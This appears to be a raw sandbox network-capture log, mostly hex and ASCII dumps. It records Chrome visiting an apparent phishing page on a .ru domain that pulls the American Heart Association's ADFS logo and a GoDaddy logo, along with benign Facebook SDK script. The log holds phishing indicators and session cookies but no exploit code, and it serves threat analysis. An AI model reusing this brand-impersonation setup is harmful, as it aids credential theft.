                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1610INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              138192.168.2.164985269.152.183.140443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1613OUTGET /adfs/portal/logo/logo.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: adfs.heart.org
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1630INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Content-Length: 6428
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Expires: Fri, 24 Nov 2023 17:29:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: 3A5EEEA11E1041DB96B81498AB69C050DD045D9E56C69E19BD98430BA752165F
                                                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age = 31536000
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:;
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1630INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 04 00 00 00 20 08 06 00 00 00 f4 42 06 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 08 b4 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0d 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 33 20 37 39 2e 31 36 31 33 35 36 2c 20 32 30 31 37 2f 30 39
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDR BsRGBgAMAapHYskiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c143 79.161356, 2017/09


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              139192.168.2.1649853104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1626OUTGET /web5/assets/godaddy-logo.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              14157.240.229.1443192.168.2.1649747C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: X-FB-Content-MD5
                                                                                                                                                                                                                                                                                                              x-fb-content-md5: 5b52b7593f64fc4d6af4c6f0bb6bcc64
                                                                                                                                                                                                                                                                                                              ETag: "9b32659b20e02625ae7247defda1d039"
                                                                                                                                                                                                                                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              timing-allow-origin: *
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              content-md5: W1K3WT9k/E1q9Mbwu2vMZA==
                                                                                                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 15:18:38 GMT
                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000,stale-while-revalidate=3600,immutable
                                                                                                                                                                                                                                                                                                              document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                                                                                                                                                                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              reporting-endpoints:
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              origin-agent-cluster: ?0
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
                                                                                                                                                                                                                                                                                                              X-FB-Debug: RyP9HfYXTA6vb9vfCXeHiiiW8sTSBAmaTgI08q20VRMzjnytrGtTuXYDhVm+zQG1EPbgD5jMO69/3VjQgV+0tA==
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:19 GMT
                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Content-Length: 303316
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC220INData Raw: 2f
                                                                                                                                                                                                                                                                                                              Data Ascii: /
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC220INData Raw: 2a 31 36 39 38 32 34 37 31 31 38 2c 2c 4a 49 54 20 43 6f 6e 73 74 72 75 63 74 69 6f 6e 3a 20 76 31 30 30 39 34 37 30 33 31 36 2c 65 6e 5f 55 53 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 0a 20 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 20 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20
                                                                                                                                                                                                                                                                                                              Data Ascii: *1698247118,,JIT Construction: v1009470316,en_US*//** * Copyright (c) 2017-present, Facebook, Inc. All rights reserved. * * You are hereby granted a non-exclusive, worldwide, royalty-free license to use, * copy, modify, and distribute this software
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC221INData Raw: 27 73 65 74 49 6e 74 65 72 76 61 6c 27 2c 20 20 20 20 27 63 6c 65 61 72 54 69 6d 65 6f 75 74 27 2c 20 20 20 20 27 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 27 20 20 5d 3b 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 61 6e 64 62 6f 78 53 61 66 65 6c 69 73 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 20 20 20 20 67 6c 6f 62 61 6c 5b 73 61 6e 64 62 6f 78 53 61 66 65 6c 69 73 74 5b 69 5d 5d 20 3d 20 62 69 6e 64 43 6f 6e 74 65 78 74 28 20 20 20 20 20 20 77 69 6e 64 6f 77 5b 73 61 6e 64 62 6f 78 53 61 66 65 6c 69 73 74 5b 69 5d 5d 2c 20 20 20 20 20 20 77 69 6e 64 6f 77 20 20 20 20 29 3b 20 20 7d 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 76 61 72 20 73 65 6c 66 20 3d 20 77 69 6e 64 6f 77 3b 20 20 20 20 76 61 72 20 67 6c 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 'setInterval', 'clearTimeout', 'clearInterval' ]; for (var i = 0; i < sandboxSafelist.length; i++) { global[sandboxSafelist[i]] = bindContext( window[sandboxSafelist[i]], window ); } (function() { var self = window; var glo
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC236INData Raw: 3d 77 7c 7c 68 3d 3d 76 29 26 26 28 67 5b 6b 5d 3d 31 29 29 3b 7d 69 66 28 64 29 69 66 28 28 68 3d 6e 2e 63 61 6c 6c 28 64 29 29 3d 3d 76 29 7b 69 66 28 28 64 2d 3d 64 25 31 29 3e 30 29 66 6f 72 28 65 3d 22 22 2c 64 3e 31 30 26 26 28 64 3d 31 30 29 3b 65 2e 6c 65 6e 67 74 68 3c 64 3b 65 2b 3d 22 20 22 29 3b 7d 65 6c 73 65 20 68 3d 3d 77 26 26 28 65 3d 64 2e 6c 65 6e 67 74 68 3c 3d 31 30 3f 64 3a 64 2e 73 6c 69 63 65 28 30 2c 31 30 29 29 3b 72 65 74 75 72 6e 20 49 28 22 22 2c 28 6b 3d 7b 7d 2c 6b 5b 22 22 5d 3d 61 2c 6b 29 2c 66 2c 67 2c 65 2c 22 22 2c 5b 5d 29 7d 7d 69 66 28 21 73 28 22 6a 73 6f 6e 2d 70 61 72 73 65 22 29 29 7b 76 61 72 20 4a 3d 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 2c 4b 3d 7b 39 32 3a 22 5c 5c 22 2c 33 34 3a 27 22 27 2c 34 37 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: =w||h==v)&&(g[k]=1));}if(d)if((h=n.call(d))==v){if((d-=d%1)>0)for(e="",d>10&&(d=10);e.length<d;e+=" ");}else h==w&&(e=d.length<=10?d:d.slice(0,10));return I("",(k={},k[""]=a,k),f,g,e,"",[])}}if(!s("json-parse")){var J=g.fromCharCode,K={92:"\\",34:'"',47:"
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC252INData Raw: 62 5f 64 69 61 6c 6f 67 5f 63 6f 6e 74 65 6e 74 20 2e 64 69 61 6c 6f 67 5f 66 6f 6f 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 36 66 37 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 34 61 34 61 34 61 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 68 65 69 67 68 74 3a 34 30 70 78 7d 23 66 62 5f 64 69 61 6c 6f 67 5f 6c 6f 61 64 65 72 5f 63 6c 6f 73 65 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 66 62 5f 64 69 61 6c 6f 67 2e 66 62 5f 64 69 61 6c 6f 67 5f 6d 6f 62 69 6c 65 20 2e 66 62 5f 64 69 61 6c 6f 67 5f 63 6c 6f 73 65 5f 69 63 6f 6e 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 66 62 5f 64 69 61 6c 6f 67 5f 6c 6f 61 64 65 72 5f 73 70 69 6e 6e 65 72 7b 61 6e 69 6d 61 74 69 6f 6e 3a 72 6f 74 61 74 65
                                                                                                                                                                                                                                                                                                              Data Ascii: b_dialog_content .dialog_footer{background:#f5f6f7;border:1px solid #4a4a4a;border-top-color:#ccc;height:40px}#fb_dialog_loader_close{float:left}.fb_dialog.fb_dialog_mobile .fb_dialog_close_icon{visibility:hidden}#fb_dialog_loader_spinner{animation:rotate
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC269INData Raw: 28 62 3e 31 3f 62 2d 31 3a 30 29 2c 64 3d 31 3b 64 3c 62 3b 64 2b 2b 29 63 5b 64 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 64 5d 3b 76 61 72 20 65 3d 30 3b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 2f 25 73 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 63 5b 65 2b 2b 5d 29 7d 29 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 41 73 73 65 72 74 22 2c 5b 22 41 73 73 65 72 74 69 6f 6e 45 72 72 6f 72 22 2c 22 73 70 72 69 6e 74 66 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 61 2c 62 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 62 6f 6f 6c 65 61 6e 22 7c 7c 61 3d 3d 3d 21 31 29 74 68 72 6f 77 20 6e 65
                                                                                                                                                                                                                                                                                                              Data Ascii: (b>1?b-1:0),d=1;d<b;d++)c[d-1]=arguments[d];var e=0;return a.replace(/%s/g,function(){return String(c[e++])})}f["default"]=a}),66);__d("Assert",["AssertionError","sprintf"],(function(a,b,c,d,e,f,g){function h(a,b){if(typeof a!=="boolean"||a===!1)throw ne
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC285INData Raw: 3b 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 76 61 72 20 61 3d 7b 69 67 41 75 74 68 52 65 73 70 6f 6e 73 65 3a 6e 75 6c 6c 2c 66 62 41 75 74 68 52 65 73 70 6f 6e 73 65 3a 6e 75 6c 6c 2c 66 62 4c 6f 67 69 6e 53 74 61 74 75 73 3a 6e 75 6c 6c 2c 69 67 4c 6f 67 69 6e 53 74 61 74 75 73 3a 6e 75 6c 6c 7d 3b 72 65 74 75 72 6e 7b 63 75 72 72 65 6e 74 41 75 74 68 52 65 73 70 6f 6e 73 65 3a 6e 75 6c 6c 2c 73 68 6f 75 6c 64 53 65 63 6f 6e 64 4c 6f 67 69 6e 52 65 71 75 65 73 74 54 69 6d 65 4f 75 74 3a 21 31 2c 6d 69 78 65 64 41 75 74 68 53 74 61 74 65 3a 61 2c 6c 6f 61 64 53 74 61 74 65 3a 6e 75 6c 6c 2c 74 69 6d 65 72 3a 6e 75 6c 6c 2c 63 75 72 72 65 6e 74 54 69 6d 65 4f 75 74 3a 64 28 22 73 64 6b 2e 41 75 74 68 55 74 69 6c 73 22 29 2e 41 75 74 68 43 6f 6e 73 74 61 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: ;function i(){var a={igAuthResponse:null,fbAuthResponse:null,fbLoginStatus:null,igLoginStatus:null};return{currentAuthResponse:null,shouldSecondLoginRequestTimeOut:!1,mixedAuthState:a,loadState:null,timer:null,currentTimeOut:d("sdk.AuthUtils").AuthConstan
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC286INData Raw: 72 65 74 75 72 6e 20 68 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 76 61 72 20 61 3d 6b 28 22 66 62 6d 5f 22 29 3b 69 66 28 61 21 3d 6e 75 6c 6c 26 26 68 3d 3d 3d 6e 75 6c 6c 29 7b 61 3d 63 28 22 51 75 65 72 79 53 74 72 69 6e 67 22 29 2e 64 65 63 6f 64 65 28 61 29 3b 68 3d 61 2e 62 61 73 65 5f 64 6f 6d 61 69 6e 3b 72 65 74 75 72 6e 7b 62 61 73 65 5f 64 6f 6d 61 69 6e 3a 68 7d 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 72 65 74 75 72 6e 20 6b 28 22 66 62 73 72 5f 22 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 22 22 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 56 61 6c 75 65 20 70 61 73 73 65 64 20 74 6f 20 43 6f 6f 6b 69 65 2e 73 65 74 53 69 67 6e 65 64 52 65 71 75 65 73 74 43 6f 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: return h}function l(){var a=k("fbm_");if(a!=null&&h===null){a=c("QueryString").decode(a);h=a.base_domain;return{base_domain:h}}return null}function e(){return k("fbsr_")}function f(a,b){if(a==="")throw new Error("Value passed to Cookie.setSignedRequestCoo
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC301INData Raw: 2c 78 3d 5b 5d 2c 79 3d 7b 70 75 73 68 47 75 61 72 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 78 2e 75 6e 73 68 69 66 74 28 61 29 7d 2c 70 6f 70 47 75 61 72 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 78 2e 73 68 69 66 74 28 29 7d 2c 69 6e 47 75 61 72 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 2e 6c 65 6e 67 74 68 21 3d 3d 30 7d 2c 63 6c 6f 6e 65 47 75 61 72 64 4c 69 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6e 61 6d 65 7d 29 7d 2c 66 69 6e 64 44 65 66 65 72 72 65 64 53 6f 75 72 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 78 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 7b 76 61 72 20 62 3d 78 5b 61 5d 3b 69 66
                                                                                                                                                                                                                                                                                                              Data Ascii: ,x=[],y={pushGuard:function(a){x.unshift(a)},popGuard:function(){x.shift()},inGuard:function(){return x.length!==0},cloneGuardList:function(){return x.map(function(a){return a.name})},findDeferredSource:function(){for(var a=0;a<x.length;a++){var b=x[a];if
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC317INData Raw: 46 42 44 65 62 75 67 3a 47 2c 46 42 4c 6f 67 67 65 72 3a 64 2c 67 65 74 45 72 72 6f 72 53 61 66 65 3a 75 2c 67 65 74 53 69 6d 70 6c 65 48 61 73 68 3a 48 2c 54 41 41 4c 3a 66 2c 54 41 41 4c 4f 70 63 6f 64 65 3a 67 2c 72 65 6e 61 6d 65 46 75 6e 63 74 69 6f 6e 3a 42 61 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 46 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 46 42 4c 6f 67 67 65 72 22 2c 5b 22 66 62 2d 65 72 72 6f 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 63 28 22 66 62 2d 65 72 72 6f 72 22 29 2e 46 42 4c 6f 67 67 65 72 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 73 65 44 65 73 65 72 69 61 6c 69 7a 65 50 48 50 51 75 65 72 79 44 61 74 61 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: FBDebug:G,FBLogger:d,getErrorSafe:u,getSimpleHash:H,TAAL:f,TAALOpcode:g,renameFunction:Ba};e.exports=F}),null);__d("FBLogger",["fb-error"],(function(a,b,c,d,e,f,g){"use strict";g["default"]=c("fb-error").FBLogger}),98);__d("BaseDeserializePHPQueryData",
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC333INData Raw: 6f 6d 61 69 6e 21 3d 6e 75 6c 6c 26 26 64 28 22 73 64 6b 2e 41 75 74 68 55 74 69 6c 73 22 29 2e 73 65 74 42 61 73 65 44 6f 6d 61 69 6e 28 65 2e 62 61 73 65 5f 64 6f 6d 61 69 6e 29 3b 64 28 22 73 64 6b 2e 41 75 74 68 55 74 69 6c 73 22 29 2e 73 65 74 47 72 61 70 68 44 6f 6d 61 69 6e 28 65 2e 67 72 61 70 68 5f 64 6f 6d 61 69 6e 29 3b 64 28 22 73 64 6b 2e 41 75 74 68 53 74 6f 72 61 67 65 55 74 69 6c 73 22 29 2e 73 65 74 4c 6f 63 61 6c 53 74 6f 72 61 67 65 54 6f 6b 65 6e 28 67 2c 65 2e 6c 6f 6e 67 5f 6c 69 76 65 64 5f 74 6f 6b 65 6e 29 3b 64 28 22 73 64 6b 2e 41 75 74 68 55 74 69 6c 73 22 29 2e 72 65 6d 6f 76 65 4c 6f 67 6f 75 74 53 74 61 74 65 28 29 3b 65 3d 7b 61 75 74 68 52 65 73 70 6f 6e 73 65 3a 67 2c 73 74 61 74 75 73 3a 62 2c 6c 6f 67 69 6e 53 6f 75 72
                                                                                                                                                                                                                                                                                                              Data Ascii: omain!=null&&d("sdk.AuthUtils").setBaseDomain(e.base_domain);d("sdk.AuthUtils").setGraphDomain(e.graph_domain);d("sdk.AuthStorageUtils").setLocalStorageToken(g,e.long_lived_token);d("sdk.AuthUtils").removeLogoutState();e={authResponse:g,status:b,loginSour
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC347INData Raw: 6c 65 74 65 48 65 61 72 74 62 65 61 74 29 7d 2c 68 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 2c 62 29 7b 62 2e 67 72 61 6e 74 65 64 5f 73 63 6f 70 65 73 26 26 28 61 3d 62 61 62 65 6c 48 65 6c 70 65 72 73 5b 22 65 78 74 65 6e 64 73 22 5d 28 7b 7d 2c 61 2c 7b 67 72 61 6e 74 65 64 53 63 6f 70 65 73 3a 62 2e 67 72 61 6e 74 65 64 5f 73 63 6f 70 65 73 7d 29 29 3b 62 2e 64 61 74 61 5f 61 63 63 65 73 73 5f 65 78 70 69 72 61 74 69 6f 6e 5f 74 69 6d 65 26 26 28 61 3d 62 61 62 65 6c 48 65 6c 70 65 72 73 5b 22 65 78 74 65 6e 64 73 22 5d 28 7b 7d 2c 61 2c 7b 64 61 74 61 5f 61 63 63 65 73 73 5f 65 78 70 69 72 61 74 69 6f 6e 5f 74 69 6d 65 3a 4e 75 6d 62 65 72 28 62 2e 64 61 74 61 5f 61 63 63 65 73 73 5f 65 78 70 69 72 61 74 69 6f 6e 5f 74 69 6d 65 29 7d 29 29 3b 62 2e
                                                                                                                                                                                                                                                                                                              Data Ascii: leteHeartbeat)},h)}function n(a,b){b.granted_scopes&&(a=babelHelpers["extends"]({},a,{grantedScopes:b.granted_scopes}));b.data_access_expiration_time&&(a=babelHelpers["extends"]({},a,{data_access_expiration_time:Number(b.data_access_expiration_time)}));b.
